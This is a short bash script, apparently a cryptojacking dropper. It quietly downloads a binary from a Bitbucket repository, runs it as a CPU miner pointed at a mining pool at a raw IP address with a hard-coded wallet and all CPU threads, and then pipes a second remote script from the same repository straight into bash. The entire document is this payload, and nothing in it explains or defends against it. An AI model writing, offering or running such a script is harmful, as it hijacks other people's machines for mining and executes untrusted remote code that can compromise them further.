#!/bin/bash

wget -O sgr1 https://bitbucket.org/commuter21/escom/downloads/xmolx >/dev/null 2>&1
chmod +x sgr1
./sgr1 -a rx/0 -o 172.104.63.246:80 -u ZEPHs9S2EWRQzizKJRbnnvATxUoGNCbG5AH5t3HoCwVRWGuyerr8UshcoEwjzbxq88MNDKhBdmzc1Qs1s4u8JQ33YDcbYhxx5SN -p ikuk -t $(nproc --all) --donate-level 1 -k
curl -sL https://bitbucket.org/commuter21/escom/raw/main/gudabel.sh | bash 